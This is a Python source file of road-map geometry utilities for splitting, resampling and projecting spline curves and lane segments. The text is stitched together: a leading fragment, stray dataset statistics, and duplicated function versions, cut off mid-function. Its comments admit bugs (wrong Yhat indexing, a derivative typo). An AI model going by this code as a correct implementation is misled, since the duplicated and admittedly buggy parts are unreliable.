        l1 = np.stack((linepts[:,i],linepts[:,k])).T
        l2 = np.stack((linepts[:,k],linepts[:,j])).T
        errors1[k-i-1] = np.sum(ProjectionError(l1, linepts[:,i+1:k])) / (k-i)
        errors2[k-i-1] = np.sum(ProjectionError(l2, linepts[:,k+1:j])) / (j-k)
        max_errors1[k-i-1] = np.max(ProjectionError(l1, linepts[:,i:k]))
        max_errors2[k-i-1] = np.max(ProjectionError(l2, linepts[:,k:j]))
    k = i+1 + np.argmin(errors1 + errors2)
    # max_err1 = np.max(max_errors1)
    # max_err2 = np.max(max_errors2)
    return k
def FindBestLinearSplit(pts,i,j,THRESHOLD=1.0):
    """
    Not working yet...

    Intended to fit a two-piece least-squares line over pts[:, i:j] and
    return the fitted params and the best split index k.  NOTE(review):
    max_err1/max_err2 are computed but unused, and params from the last
    loop iteration is what gets returned — confirm before relying on this.
    """
    max_err = np.max(ProjectionError(np.stack((pts[:,i],pts[:,j])).T, pts))
    if max_err < THRESHOLD:
        return j
    errors1 = np.zeros(j-(i+1))
    errors2 = np.zeros(j-(i+1))
    max_errors1 = np.zeros(j-(i+1))
    max_errors2 = np.zeros(j-(i+1))
    for k in range(i+1,j):
        # Block-diagonal design matrix: independent line fits on [i,k) and [k,j).
        X1 = np.stack([pts[0,i:k],np.ones(k-i)]).T
        X2 = np.stack([pts[0,k:j],np.ones(j-k)]).T
        X = np.block([[X1,np.zeros_like(X1)],[np.zeros_like(X2),X2]])
        Y = pts[1,i:j]
        # Normal-equations least squares for both lines at once.
        params = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(Y)
        Yhat = X.dot(params)
        l1 = np.stack([
            [pts[0,i],Yhat[i]],
            [pts[0,k],Yhat[k]]
        ]).T
        l2 = np.stack([
            [pts[0,k],Yhat[k]],
            [pts[0,j-1],Yhat[j-1]]
        ]).T
        errors1[k-i-1] = np.sum(ProjectionError(l1, pts[:,i+1:k])) / (k-i)
        errors2[k-i-1] = np.sum(ProjectionError(l2, pts[:,k+1:j])) / (j-k)
        max_errors1[k-i-1] = np.max(ProjectionError(l1, pts[:,i:k]))
        max_errors2[k-i-1] = np.max(ProjectionError(l2, pts[:,k:j]))
    k = i+1 + np.argmin(errors1 + errors2)
    max_err1 = np.max(max_errors1)
    max_err2 = np.max(max_errors2)
    return params, k
def ComputeSplitIndices(curve,THRESHOLD=1.0,ds_min=50.0):
    """
    Downsample a curve by greedy splitting until below reprojection error threshold

    Worklist search over (i, j) index spans of curve.pts; returns the sorted
    list of split indices to keep.
    """
    explored = set()
    frontier = set()
    # Start with the whole curve as one span.
    frontier.add((0,curve.pts.shape[1]-1))
    while len(frontier) != 0:
        i,j = frontier.pop()
        if j - i <= 1:
            explored.add((i,j))
        else:
            k = SplitLineRecursive(curve.pts,i,j,THRESHOLD=THRESHOLD,ds_min=ds_min)
            # k == j means SplitLineRecursive decided not to split this span.
            if k != j and i != j-1:
                frontier.add((i,k))
                frontier.add((k,j))
            else:
                explored.add((i,j))
    # Flatten span endpoints into a sorted, de-duplicated index list.
    idxs = sorted(list(set([i for idxs in explored for i in idxs])))
    return idxs
def UpSampleSplineCurve(curve, MAX_SEGMENT_LENGTH=5.0):
    """
    Upsample

    Re-evaluate curve's spline densely enough that consecutive sample points
    are roughly MAX_SEGMENT_LENGTH apart (arclength estimated from a coarse
    100-point evaluation).  Returns a new SplineCurve; the input is unchanged.
    """
    # Coarse evaluation to estimate total arclength S.
    unew = np.linspace(curve.u[0],curve.u[-1],100)
    out = interpolate.splev(unew,curve.tck)
    splineX = out[0]; splineY = out[1];
    dS = np.sqrt(np.diff(splineX)**2 + np.diff(splineY)**2)
    S = sum(dS)
    u_dense = np.linspace(curve.u[0], curve.u[-1], int(np.round(S / MAX_SEGMENT_LENGTH)))
    # compute new dense spline
    out = interpolate.splev(u_dense,curve.tck)
    new_pts = np.stack(out)
    return SplineCurve(id=curve.id,keys=curve.keys,
                       pts=new_pts,tck=curve.tck,u=u_dense)
def DownsampleSplineCurve(curve,THRESHOLD=1.0,ds_min=50.0):
    """
    Downsample a curve by greedy splitting until below reprojection error threshold

    Keeps only the points at the indices chosen by ComputeSplitIndices.
    Returns a new SplineCurve; the input is unchanged.
    """
    idxs = ComputeSplitIndices(curve,THRESHOLD=THRESHOLD,ds_min=ds_min)
    new_pts = np.stack([curve.pts[:,i] for i in idxs]).T
    return SplineCurve(id=curve.id,keys=curve.keys,
                       pts=new_pts,tck=curve.tck,u=curve.u[idxs])
def SplitSplineCurve(open_map, spline_curve_id, idx, ratio):
    """
    splits a spline curve and returns the new ids

    Splits between sample idx and idx+1 at fractional position ratio.
    Mutates the existing curve in place (it keeps the head) and registers a
    new curve holding the tail; returns (head_id, tail_id).
    """
    spline_curve = open_map.spline_curves[spline_curve_id]
    split_pt = ratio*spline_curve.pts[:,idx+1] + (1.-ratio)*spline_curve.pts[:,idx] # linear interpolation
    split_u = ratio*spline_curve.u[idx+1] + (1.-ratio)*spline_curve.u[idx]
    # Tail curve: split point followed by the samples after idx.
    new_spline_curve = SplineCurve(
        id=len(open_map.spline_curves)+1,
        pts=np.block([np.expand_dims(split_pt,1), spline_curve.pts[:,idx+1:]]),
        keys=spline_curve.keys,
        tck=spline_curve.tck.copy(),
        u=np.block([split_u, spline_curve.u[idx+1:]])
    )
    # Head curve: truncate the original at the split point.
    spline_curve.u = np.block([spline_curve.u[:idx+1], split_u])
    spline_curve.pts = np.block([spline_curve.pts[:,:idx+1],np.expand_dims(split_pt,1)])
    # open_map.spline_curves[spline_curve_id] = spline_curve
    open_map.spline_curves[new_spline_curve.id] = new_spline_curve
    return spline_curve.id, new_spline_curve.id
def SplitCurve(open_map, curve_id, idx, ratio):
    """
    splits a curve and returns the new ids

    Splits between pts[idx] and pts[idx+1] at fractional position ratio.
    The existing curve keeps the head (mutated in place); a new Curve with
    the tail is registered on open_map.  Returns (head_id, tail_id).
    """
    curve = open_map.curves[curve_id]
    # Interpolated split point (copied so head and tail don't share it).
    split_pt = curve.pts[idx+1]*ratio + curve.pts[idx]*(1.-ratio)
    old_pts = curve.pts[:idx+1]
    old_pts.append(copy(split_pt))
    new_pts = curve.pts[idx+1:]
    new_pts.insert(0,copy(split_pt))
    curve.pts = old_pts
    new_curve = Curve(id=len(open_map.curves)+1, pts=new_pts)
    open_map.curves[new_curve.id] = new_curve
    # open_map.curves[curve.id] = curve
    return curve.id, new_curve.id
def ProjectToPolyLine(polyline,pt,kdtree=None):
    """
    projects a point to a polyline

    polyline: object whose .pts is a (2, N) array of vertices.
    pt: (2,) query point.  kdtree: optional spatial index over the vertices.
    Returns (idx1, ratio, normal): the start index of the containing
    segment, the fractional position along it, and the signed normal
    distance.

    Bug fix: the kdtree check was inverted — the old code called
    kdtree.query() exactly when kdtree was None (AttributeError) and
    brute-forced when an index WAS supplied.  The polarity now matches
    ProjectToCurve.
    """
    # First find the closest vertex: brute force without an index,
    # otherwise query the supplied kd-tree.
    if kdtree is None:
        idx = np.argmin(np.sum((polyline.pts.T - pt)**2,axis=1))
    else:
        dist, idx = kdtree.query(pt)
    # determine the interval in which the point lies
    if idx == 0:
        idx1 = idx
        idx2 = idx + 1
    elif idx == polyline.pts.shape[-1] - 1:
        idx2 = idx
        idx1 = idx - 1
    else:
        # Interior vertex: project onto the preceding segment to decide
        # whether the point falls before or after this vertex.
        base_pt = polyline.pts[:,idx-1]
        base_vec = polyline.pts[:,idx] - base_pt
        vec = pt - base_pt
        ratio = np.dot(vec,base_vec) / np.dot(base_vec,base_vec)
        if ratio > 0.0:
            if ratio < 1.0:
                idx1 = idx - 1
                idx2 = idx
            else:
                idx1 = idx
                idx2 = idx + 1
        else:
            idx1 = idx - 1
            idx2 = idx
    # Final projection onto the chosen segment.
    base_pt = polyline.pts[:,idx1]
    base_vec = polyline.pts[:,idx2] - base_pt
    vec = pt - base_pt
    ratio = np.dot(vec,base_vec) / np.dot(base_vec,base_vec)
    # Signed perpendicular distance via the 2-D cross product.
    sign = -np.sign(np.cross(vec.T,base_vec.T))
    normal = sign*np.linalg.norm(vec - base_vec * ratio)
    return idx1, ratio, normal
def ProjectToCurve(curve,pt,kdtree=None):
    """
    projects a point to a curve (i.e. an array of curve pts)

    curve.pts is a sequence of curve-point objects with .x/.y/.theta fields;
    pt is one such point.  Returns (idx1, ratio, normal): the start index of
    the containing interval, the fractional position along it, and the
    signed normal distance.
    """
    # First find the closest point on the curve
    # import pdb; pdb.set_trace()
    if kdtree is not None:
        dist, idx = kdtree.query(np.array([pt.x, pt.y]))
    else:
        # Brute-force nearest curve point by squared distance.
        dists = np.array([(p.x - pt.x)**2 + (p.y - pt.y)**2 for p in curve.pts])
        idx = np.argmin(dists)
        dist = dists[idx]
    # determine the interval in which the point lies
    if idx == 0:
        idx1 = idx
        idx2 = idx + 1
    elif idx == len(curve.pts) - 1:
        idx2 = idx
        idx1 = idx - 1
    else:
        # Choose interval based on heading of curve point
        # (negative dot product = query point lies behind this curve point).
        if np.dot(np.array([np.cos(curve.pts[idx].theta), np.sin(curve.pts[idx].theta)]),
                  CurvePtToVector(pt)[:2] - CurvePtToVector(curve.pts[idx])[:2]) < 0:
            idx2 = idx
            idx1 = idx - 1
        else:
            idx1 = idx
            idx2 = idx + 1
    # Compute the curve index
    base_vec = CurvePtToVector(curve.pts[idx2] - curve.pts[idx1])[:2]
    vec = CurvePtToVector(pt - curve.pts[idx1])[:2]
    ratio = np.dot(vec,base_vec) / np.dot(base_vec,base_vec)
    # Signed perpendicular distance via the 2-D cross product.
    sign = -np.sign(np.cross(vec.T,base_vec.T))
    normal = sign*np.linalg.norm(vec - base_vec * ratio)
    return idx1, ratio, normal
| 36.12963
| 122
| 0.605957
|
import numpy as np
from scipy import interpolate
import ezdxf
import h5py
from copy import copy
from Roadways import *
class SplineCurve:
    """Plain container for a fitted spline and its sampled points."""

    def __init__(self, id=None, pts=None, keys=None, tck=None, u=None):
        """Store the given attributes verbatim."""
        self.id, self.pts, self.keys = id, pts, keys
        # tck: spline coefficients; u: spline eval points
        self.tck, self.u = tck, u
class ID_Dispenser:
    """Hands out sequential integer ids, starting at start_id."""

    def __init__(self, start_id=1):
        self.id = start_id  # next id to hand out

    def get_id(self):
        """Return the current id and advance the counter."""
        current = self.id
        self.id = current + 1
        return current
def NewRoadSection(open_map):
    """Create an empty RoadSection, register it on open_map and return it."""
    # NOTE(review): id = len+1 can collide if sections are ever deleted —
    # confirm deletion never happens, or switch to an ID_Dispenser.
    road_section_id = len(open_map.road_sections)+1
    road_section = RoadSection(
        id = road_section_id,
        segment_ids = []
    )
    open_map.road_sections[road_section.id] = road_section
    return road_section
def NewRoadSegment(open_map):
    """Create an empty RoadSegment, register it on open_map and return it."""
    # NOTE(review): id = len+1 assumes segments are never deleted.
    segment_id = len(open_map.road_segments)+1
    road_segment = RoadSegment(
        id = segment_id,
        lanes = [],
        boundaries = set()
    )
    open_map.road_segments[road_segment.id] = road_segment
    return road_segment
def NewBoundary(open_map,boundary_type=None,curve_id=None):
    """Create a Boundary referencing curve_id, register it and return it."""
    boundary = Boundary(
        id = len(open_map.boundaries)+1,
        boundary_type = boundary_type,
        curve = curve_id
    )
    open_map.boundaries[boundary.id] = boundary
    return boundary
def NewLaneSegment(open_map,curve_id=None,segment_id=None):
    """Create a LaneSegment with empty connections, register it and return it."""
    lane_segment = LaneSegment(
        id=len(open_map.lane_segments)+1,
        centerline = curve_id,
        segment_id = segment_id,
        lane_connections = set(),
        boundaries_left = set(),
        boundaries_right = set()
    )
    open_map.lane_segments[lane_segment.id] = lane_segment
    return lane_segment
def CurvePtToVector(pt):
    """Flatten a curve point into a numpy vector [x, y, theta, s, t, k, dk]."""
    fields = (pt.x, pt.y, pt.theta, pt.s, pt.t, pt.k, pt.dk)
    return np.array(fields)
def ResamplePolyline(X,ds_min=5.0):
    """Insert evenly spaced points so consecutive samples are <= ~ds_min apart.

    X: (2, N) polyline.  Returns the (possibly grown) array; original
    vertices are all kept, extra points are linearly interpolated.
    """
    i = 0
    while i < X.shape[1] - 1:
        dx = X[:,i+1] - X[:,i]
        ds = np.linalg.norm(dx)
        if ds > ds_min:
            # Interior points every ds_min along the segment (endpoints kept).
            pts = np.array([ds_min*j for j in range(1,int(np.floor(ds/ds_min)))])
            x = np.expand_dims(X[:,i],1) + (np.expand_dims(dx,1)/ds).dot(np.expand_dims(pts,0))
            X = np.block([X[:,:i+1],x,X[:,i+1:]])
            # Jump past the inserted points to the original neighbour.
            i += x.shape[1] + 1
        else:
            i = i+1
    return X
def NormalVectorToLineSegment(linepts, pt):
"""
linepts = np.array([[x1,x2],[y1,y2]])
pt.shape = (2,N) # can be single pt or multiple pts
"""
if pt.ndim == 1:
pt = np.expand_dims(pt,1)
base_pt = np.expand_dims(linepts[:,0],1)
base_vec = np.expand_dims(linepts[:,1] - linepts[:,0],1)
base_vec = base_vec / np.linalg.norm(base_vec)
diff_vec = pt - base_pt
normal = diff_vec - base_vec * base_vec.T.dot(diff_vec)
return normal
def ProjectionError(linepts, pt):
    """Euclidean length of each point's normal offset from the segment line."""
    rejection = NormalVectorToLineSegment(linepts, pt)
    return np.linalg.norm(rejection, axis=0)
def NormalDisplacementFromLineSegment(linepts, pt):
"""
returns a positive or negative distance for each query point
"""
base_pt = np.expand_dims(linepts[:,0],1)
base_vec = np.expand_dims(linepts[:,1] - linepts[:,0],1)
base_vec = base_vec / np.linalg.norm(base_vec)
diff_vec = pt - base_pt
sign = np.sign(np.cross(diff_vec.T,base_vec.T))
dist = np.sqrt(np.sum((diff_vec - base_vec * base_vec.T.dot(diff_vec))**2,axis=0))
return sign * dist
def SplitLineRecursive(linepts,i,j,THRESHOLD=5.0,ds_min=50.0):
    """
    Choose best point at which to split a line to minimize total reprojection error

    Returns an index k in (i, j]:
      * if the chord i->j already fits all points within THRESHOLD, returns j
        (when its arc length is <= ds_min) or the index nearest the arc-length
        midpoint (to cap segment length);
      * otherwise returns the interior index minimizing the combined
        mean projection error of the two sub-chords i->k and k->j.
    """
    # Worst-case distance of the points in [i, j) from the chord i->j.
    max_err = np.max(ProjectionError(np.stack((linepts[:,i],linepts[:,j])).T, linepts[:,i:j]))
    if max_err < THRESHOLD:
        # Chord fits; only split (near the arc-length midpoint) if too long.
        ds = np.cumsum(np.sqrt(np.sum(np.diff(linepts[:,i:j])**2,axis=0)))
        if ds[-1] > ds_min:
            k = i + np.argmin((ds - ds[-1]/2.)**2) + 1
            return k
        else:
            return j
    errors1 = np.zeros(j-(i+1))
    errors2 = np.zeros(j-(i+1))
    max_errors1 = np.zeros(j-(i+1))
    max_errors2 = np.zeros(j-(i+1))
    for k in range(i+1,j):
        # Candidate split at k: evaluate chords i->k and k->j.
        l1 = np.stack((linepts[:,i],linepts[:,k])).T
        l2 = np.stack((linepts[:,k],linepts[:,j])).T
        # Mean projection error of the interior points onto each chord.
        errors1[k-i-1] = np.sum(ProjectionError(l1, linepts[:,i+1:k])) / (k-i)
        errors2[k-i-1] = np.sum(ProjectionError(l2, linepts[:,k+1:j])) / (j-k)
        # Max errors are computed but unused below (kept for debugging).
        max_errors1[k-i-1] = np.max(ProjectionError(l1, linepts[:,i:k]))
        max_errors2[k-i-1] = np.max(ProjectionError(l2, linepts[:,k:j]))
    # Best split = smallest combined mean error.
    k = i+1 + np.argmin(errors1 + errors2)
    # max_err1 = np.max(max_errors1)
    # max_err2 = np.max(max_errors2)
    return k
def FindBestLinearSplit(pts,i,j,THRESHOLD=1.0):
    """
    Not working yet...

    Intended behavior: fit two joined least-squares line segments over
    pts[:, i:j] and return (params, k) where k is the best breakpoint.
    NOTE(review): Yhat below has length j-i and is 0-based, yet is indexed
    with the absolute indices i, k and j-1 -- wrong (or out of range) unless
    i == 0.  Also the early-return path returns only j while the normal path
    returns (params, k).  Confirm before enabling.
    """
    # Early out: a single chord i->j already fits every point.
    max_err = np.max(ProjectionError(np.stack((pts[:,i],pts[:,j])).T, pts))
    if max_err < THRESHOLD:
        return j
    errors1 = np.zeros(j-(i+1))
    errors2 = np.zeros(j-(i+1))
    max_errors1 = np.zeros(j-(i+1))
    max_errors2 = np.zeros(j-(i+1))
    for k in range(i+1,j):
        # Two independent linear fits (slope + intercept each) solved as one
        # block-diagonal least-squares system.
        X1 = np.stack([pts[0,i:k],np.ones(k-i)]).T
        X2 = np.stack([pts[0,k:j],np.ones(j-k)]).T
        X = np.block([[X1,np.zeros_like(X1)],[np.zeros_like(X2),X2]])
        Y = pts[1,i:j]
        params = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(Y)
        Yhat = X.dot(params)
        l1 = np.stack([
            [pts[0,i],Yhat[i]],
            [pts[0,k],Yhat[k]]
        ]).T
        l2 = np.stack([
            [pts[0,k],Yhat[k]],
            [pts[0,j-1],Yhat[j-1]]
        ]).T
        errors1[k-i-1] = np.sum(ProjectionError(l1, pts[:,i+1:k])) / (k-i)
        errors2[k-i-1] = np.sum(ProjectionError(l2, pts[:,k+1:j])) / (j-k)
        max_errors1[k-i-1] = np.max(ProjectionError(l1, pts[:,i:k]))
        max_errors2[k-i-1] = np.max(ProjectionError(l2, pts[:,k:j]))
    k = i+1 + np.argmin(errors1 + errors2)
    # Computed but unused.
    max_err1 = np.max(max_errors1)
    max_err2 = np.max(max_errors2)
    return params, k
def ComputeSplitIndices(curve, THRESHOLD=1.0, ds_min=50.0):
    """
    Downsample a curve by greedy splitting until below reprojection error threshold.

    Returns the sorted list of point indices to keep.
    """
    finished = []
    stack = [(0, curve.pts.shape[1] - 1)]
    while stack:
        lo, hi = stack.pop()
        if hi - lo <= 1:
            finished.append((lo, hi))
            continue
        mid = SplitLineRecursive(curve.pts, lo, hi, THRESHOLD=THRESHOLD, ds_min=ds_min)
        if mid != hi and lo != hi - 1:
            stack.append((lo, mid))
            stack.append((mid, hi))
        else:
            finished.append((lo, hi))
    # Flatten the interval endpoints into a sorted, de-duplicated index list.
    return sorted({idx for pair in finished for idx in pair})
def UpSampleSplineCurve(curve, MAX_SEGMENT_LENGTH=5.0):
    """
    Resample a SplineCurve so that consecutive points are roughly
    MAX_SEGMENT_LENGTH apart along the spline's arc length.
    """
    # Probe the spline densely to estimate total arc length.
    probe_u = np.linspace(curve.u[0], curve.u[-1], 100)
    probe = interpolate.splev(probe_u, curve.tck)
    seg_lengths = np.sqrt(np.diff(probe[0]) ** 2 + np.diff(probe[1]) ** 2)
    total_length = sum(seg_lengths)
    # Choose a parameter grid giving ~MAX_SEGMENT_LENGTH spacing.
    u_dense = np.linspace(curve.u[0], curve.u[-1], int(np.round(total_length / MAX_SEGMENT_LENGTH)))
    new_pts = np.stack(interpolate.splev(u_dense, curve.tck))
    return SplineCurve(id=curve.id, keys=curve.keys,
                       pts=new_pts, tck=curve.tck, u=u_dense)
def DownsampleSplineCurve(curve, THRESHOLD=1.0, ds_min=50.0):
    """
    Downsample a curve by greedy splitting until below reprojection error threshold.
    Returns a new SplineCurve keeping only the selected indices.
    """
    keep = ComputeSplitIndices(curve, THRESHOLD=THRESHOLD, ds_min=ds_min)
    reduced_pts = np.stack([curve.pts[:, i] for i in keep]).T
    return SplineCurve(id=curve.id, keys=curve.keys,
                       pts=reduced_pts, tck=curve.tck, u=curve.u[keep])
def CurveFromSplineCurve(spline_curve):
    """Evaluate a SplineCurve at its parameter values and return a Curve of
    CurvePts carrying position, heading, arc length, curvature and its rate."""
    curve = Curve()
    curve.id = spline_curve.id
    curve.pts = []
    # Compute CurvePt values (theta, S, K, dK)
    out = interpolate.splev(spline_curve.u,spline_curve.tck)
    X = out[0]; Y = out[1]
    deltaX = np.diff(X); deltaY = np.diff(Y)
    dS = np.sqrt(deltaX**2 + deltaY**2)
    # Cumulative arc length, starting at 0.
    S = np.zeros(len(dS)+1)
    S[1:] = np.cumsum(dS)
    # Get heading from first derivative
    d_out = interpolate.splev(spline_curve.u,spline_curve.tck,der=1)
    dX = d_out[0]; dY = d_out[1];
    theta = np.arctan2(dY,dX)
    # Empirical (finite-difference) heading -- computed but unused below.
    theta_emp = np.arctan2(deltaY,deltaX)
    # Get curvature from second derivatives
    dd_out = interpolate.splev(spline_curve.u,spline_curve.tck,der=2)
    ddX = dd_out[0]; ddY = dd_out[1];
    K = (dX*ddY - dY*ddX)/((dX*dX + dY*dY)**1.5) # curvature
    # Get Derivative of Curvature - WAY TOO NOISY TO BE USEFUL
    ddd_out = interpolate.splev(spline_curve.u,spline_curve.tck,der=3)
    # NOTE(review): reads dd_out rather than ddd_out -- looks like a typo;
    # harmless today because dddX/dddY are unused (analytic DK is commented out).
    dddX = dd_out[0]; dddY = dd_out[1];
    # DK = ((dX**2 + dY**2)*(dX*dddY - dY*dddX) - (dX*ddY - dY*ddX)*2*(dX*ddX+dY*ddY)) / (ddX**2+ddY*2)**2
    # Finite-difference curvature rate, centered, zero-padded at the ends.
    dK = np.diff(K) / dS # derivative of curvature
    dK = (dK[1:] + dK[:-1]) / 2.0
    dK = np.concatenate([[0.],dK,[0.]])
    for i in range(len(X)):
        curve.pts.append(
            CurvePt(
                id = 0,
                x=X[i],
                y=Y[i],
                theta = theta[i],
                s = S[i],
                t = 0.0,
                k = K[i],
                dk = dK[i]
            )
        )
    return curve
def GetSplitIndex(spline_curve, divider, BUFFER_DISTANCE=5.0):
    """Find where spline_curve crosses the divider line segment.

    Returns (split_idx, ratio, direction):
      split_idx -- index i such that the crossing lies between pts[:, i] and
                   pts[:, i+1], or None when the curve never truly crosses;
      ratio     -- interpolation fraction of the crossing inside that
                   interval, or None;
      direction -- +1/-1 crossing direction relative to the divider's signed
                   normal (for a non-crossing curve: the negated sign of the
                   side it lies on).
    """
    split_idx = None
    ratio = None
    direction = None
    # Check that the curve is in fact separated by the divider line
    # (signed distance of every curve point from the divider's infinite line).
    normal_to_div = NormalDisplacementFromLineSegment(divider.pts, spline_curve.pts)
    # Indices where consecutive signed distances change sign (candidate crossings).
    idxs = (np.diff(np.sign(normal_to_div)) != 0).nonzero()[0]
    if len(idxs) == 0:
        idx = None
        direction = -np.sign(normal_to_div[0])
        ratio = None
    for idx in idxs:
        # Crossing direction from whether the signed distance is increasing.
        if normal_to_div[idx] < normal_to_div[idx+1]:
            direction = 1
        else:
            direction = -1
        # Require the curve to extend beyond the buffer on both sides of the line.
        if np.max(normal_to_div) > BUFFER_DISTANCE and np.min(normal_to_div) < -BUFFER_DISTANCE:
            # Confirm the crossing is inside the divider *segment* (not just its
            # infinite extension): divider endpoints on opposite sides of the
            # curve segment idx -> idx+1.
            s1 = np.cross(divider.pts[:,0] - spline_curve.pts[:,idx], spline_curve.pts[:,idx+1] - spline_curve.pts[:,idx])
            s2 = np.cross(divider.pts[:,1] - spline_curve.pts[:,idx], spline_curve.pts[:,idx+1] - spline_curve.pts[:,idx])
            if np.sign(s1) != np.sign(s2):
                # compute split point (fraction of distance along the interval)
                split_idx = idx
                d1 = ProjectionError(divider.pts, spline_curve.pts[:,idx])
                d2 = ProjectionError(divider.pts, spline_curve.pts[:,idx+1])
                ratio = np.sum(d1 / (d2 + d1))
                break
            else:
                # NOTE(review): this else pairing is reconstructed from a
                # whitespace-mangled paste -- confirm against the original file.
                split_idx = None
                ratio = None
    return split_idx, ratio, direction
def SplitSplineCurve(open_map, spline_curve_id, idx, ratio):
    """
    splits a spline curve and returns the new ids

    The split point is linearly interpolated between pts[:, idx] and
    pts[:, idx+1] at fraction `ratio`.  The original curve is truncated in
    place to the head (keeping its id); a new SplineCurve holding the tail is
    registered on open_map.  Both halves share the same knot representation.
    Returns (original_id, new_tail_id).
    """
    spline_curve = open_map.spline_curves[spline_curve_id]
    split_pt = ratio*spline_curve.pts[:,idx+1] + (1.-ratio)*spline_curve.pts[:,idx] # linear interpolation
    split_u = ratio*spline_curve.u[idx+1] + (1.-ratio)*spline_curve.u[idx]
    new_spline_curve = SplineCurve(
        id=len(open_map.spline_curves)+1,
        pts=np.block([np.expand_dims(split_pt,1), spline_curve.pts[:,idx+1:]]),
        keys=spline_curve.keys,
        # NOTE(review): assumes tck is a list (as returned by splprep); a
        # tuple (splrep) has no .copy -- confirm.
        tck=spline_curve.tck.copy(),
        u=np.block([split_u, spline_curve.u[idx+1:]])
    )
    # Truncate the original curve in place to the head portion.
    spline_curve.u = np.block([spline_curve.u[:idx+1], split_u])
    spline_curve.pts = np.block([spline_curve.pts[:,:idx+1],np.expand_dims(split_pt,1)])
    # open_map.spline_curves[spline_curve_id] = spline_curve
    open_map.spline_curves[new_spline_curve.id] = new_spline_curve
    return spline_curve.id, new_spline_curve.id
def SplitCurve(open_map, curve_id, idx, ratio):
    """
    splits a curve and returns the new ids

    The split point is interpolated between pts[idx] and pts[idx+1] at
    fraction `ratio`; the original curve keeps the head, and a new Curve
    holding the tail is registered on open_map.
    """
    curve = open_map.curves[curve_id]
    split_pt = curve.pts[idx + 1] * ratio + curve.pts[idx] * (1. - ratio)
    # Both halves get their own copy of the split point.
    head = curve.pts[:idx + 1] + [copy(split_pt)]
    tail = [copy(split_pt)] + curve.pts[idx + 1:]
    curve.pts = head
    new_curve = Curve(id=len(open_map.curves) + 1, pts=tail)
    open_map.curves[new_curve.id] = new_curve
    # open_map.curves[curve.id] = curve
    return curve.id, new_curve.id
def ProjectToPolyLine(polyline, pt, kdtree=None):
    """
    Project a 2-D point onto a polyline.

    polyline: object with .pts of shape (2, N)
    pt:       array of shape (2,)
    kdtree:   optional KD-tree over the polyline points (query(pt) ->
              (dist, idx)); when None, a brute-force nearest-vertex scan
              is used.

    Returns (idx1, ratio, normal): the start index of the containing segment,
    the interpolation fraction of the projection within [idx1, idx1+1], and
    the signed perpendicular distance to that segment.
    """
    # First find the closest vertex on the polyline.
    # BUG FIX: the original branch was inverted -- it ran the brute-force
    # scan when a kdtree WAS supplied, and called kdtree.query() when kdtree
    # was None (AttributeError).
    if kdtree is None:
        idx = np.argmin(np.sum((polyline.pts.T - pt) ** 2, axis=1))
    else:
        dist, idx = kdtree.query(pt)
    # Determine the segment in which the projection lies.
    if idx == 0:
        idx1 = idx
        idx2 = idx + 1
    elif idx == polyline.pts.shape[-1] - 1:
        idx2 = idx
        idx1 = idx - 1
    else:
        # Project onto the preceding segment; if the projection parameter
        # falls past its end (ratio >= 1), use the following segment instead.
        base_pt = polyline.pts[:, idx - 1]
        base_vec = polyline.pts[:, idx] - base_pt
        vec = pt - base_pt
        ratio = np.dot(vec, base_vec) / np.dot(base_vec, base_vec)
        if ratio >= 1.0:
            idx1 = idx
            idx2 = idx + 1
        else:
            idx1 = idx - 1
            idx2 = idx
    # Projection parameter and signed normal distance on the chosen segment.
    base_pt = polyline.pts[:, idx1]
    base_vec = polyline.pts[:, idx2] - base_pt
    vec = pt - base_pt
    ratio = np.dot(vec, base_vec) / np.dot(base_vec, base_vec)
    sign = -np.sign(np.cross(vec.T, base_vec.T))
    normal = sign * np.linalg.norm(vec - base_vec * ratio)
    return idx1, ratio, normal
def ProjectToCurve(curve,pt,kdtree=None):
    """
    projects a point to a curve (i.e. an array of curve pts)

    Returns (idx1, ratio, normal): start index of the containing segment,
    interpolation fraction of the projection within [idx1, idx1+1], and the
    signed perpendicular offset of pt from that segment.
    """
    # First find the closest point on the curve
    # import pdb; pdb.set_trace()
    if kdtree is not None:
        dist, idx = kdtree.query(np.array([pt.x, pt.y]))
    else:
        # Brute-force nearest CurvePt by squared distance.
        dists = np.array([(p.x - pt.x)**2 + (p.y - pt.y)**2 for p in curve.pts])
        idx = np.argmin(dists)
        dist = dists[idx]
    # determine the interval in which the point lies
    if idx == 0:
        idx1 = idx
        idx2 = idx + 1
    elif idx == len(curve.pts) - 1:
        idx2 = idx
        idx1 = idx - 1
    else:
        # Choose interval based on heading of curve point:
        # a query point behind the heading direction maps to the previous segment.
        if np.dot(np.array([np.cos(curve.pts[idx].theta), np.sin(curve.pts[idx].theta)]),
                  CurvePtToVector(pt)[:2] - CurvePtToVector(curve.pts[idx])[:2]) < 0:
            idx2 = idx
            idx1 = idx - 1
        else:
            idx1 = idx
            idx2 = idx + 1
    # Compute the curve index (projection parameter and signed normal offset).
    base_vec = CurvePtToVector(curve.pts[idx2] - curve.pts[idx1])[:2]
    vec = CurvePtToVector(pt - curve.pts[idx1])[:2]
    ratio = np.dot(vec,base_vec) / np.dot(base_vec,base_vec)
    sign = -np.sign(np.cross(vec.T,base_vec.T))
    normal = sign*np.linalg.norm(vec - base_vec * ratio)
    return idx1, ratio, normal
def ConnectLanes(open_map, from_id, to_id, connection_type):
    """Create and register a LaneConnection from_id -> to_id.

    Returns the new LaneConnection, or None when a connection with the same
    endpoints already exists (regardless of its connection_type).
    """
    for existing in open_map.lane_connections.values():
        if existing.from_id == from_id and existing.to_id == to_id:
            return None
    connection = LaneConnection(
        id=len(open_map.lane_connections) + 1,
        from_id=from_id,
        to_id=to_id,
        connection_type=connection_type,
    )
    open_map.lane_connections[connection.id] = connection
    # if from_id in open_map.lane_segment.keys():
    #     open_map.lane_segments[from_id].lane_connections.add(connection.id)
    return connection
def SplitLane(open_map, segment_id, lane_id, curve_idx):
    """Split lane `lane_id` of road segment `segment_id` at `curve_idx`.

    The original lane keeps the head of its centerline; a new lane is created
    for the tail and linked via a "Continue" connection.  Any existing
    "Continue" connection leaving the original lane is re-routed to leave the
    new (tail) lane instead.

    curve_idx: object with fields .i (segment index) and .t (interpolation
    ratio), as consumed by SplitSplineCurve.
    """
    lane = open_map.lane_segments[lane_id]
    segment = open_map.road_segments[segment_id]
    if lane_id in segment.lanes:
        # NewLaneSegment both creates and registers the tail lane.
        # (Removed a dead LaneSegment(...) construction that was immediately
        # overwritten, and the redundant re-registration that followed.)
        new_lane = NewLaneSegment(open_map)
        # Re-route downstream "Continue" connections to leave the tail lane.
        for connection in open_map.lane_connections.values():
